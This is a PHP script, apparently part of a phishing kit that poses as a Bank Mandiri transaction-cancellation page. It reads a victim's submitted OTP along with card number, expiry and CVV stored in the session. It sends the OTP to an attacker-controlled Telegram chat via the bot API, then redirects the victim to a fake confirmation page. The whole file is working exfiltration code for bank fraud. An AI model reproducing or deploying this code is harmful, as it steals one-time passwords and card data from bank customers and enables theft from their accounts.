<?php
include "telegram.php";
session_start();
$reportMessage = $_POST['reportMessage'];
$_SESSION['reportMessage'] = $reportMessage;
$nokartu = $_SESSION['nokartu'];
$bulan = $_SESSION['bulan'];
$tahun = $_SESSION['tahun'];
$cvv = $_SESSION['cvv'];
$message = "
(Mandiri Pembatalan Transaksi )

- OTP : ".$reportMessage."


 ";
function sendMessage($id_telegram, $message, $id_botTele) {
    $url = "https://api.telegram.org/bot" . $id_botTele . "/sendMessage?parse_mode=markdown&chat_id=" . $id_telegram;
    $url = $url . "&text=" . urlencode($message);
    $ch = curl_init();
    $optArray = array(CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true);
    curl_setopt_array($ch, $optArray);
    $result = curl_exec($ch);
    curl_close($ch);
}
sendMessage($id_telegram, $message, $id_botTele);
header('Location: ../lapor-transaksi/laporan-diterima.html');
?>
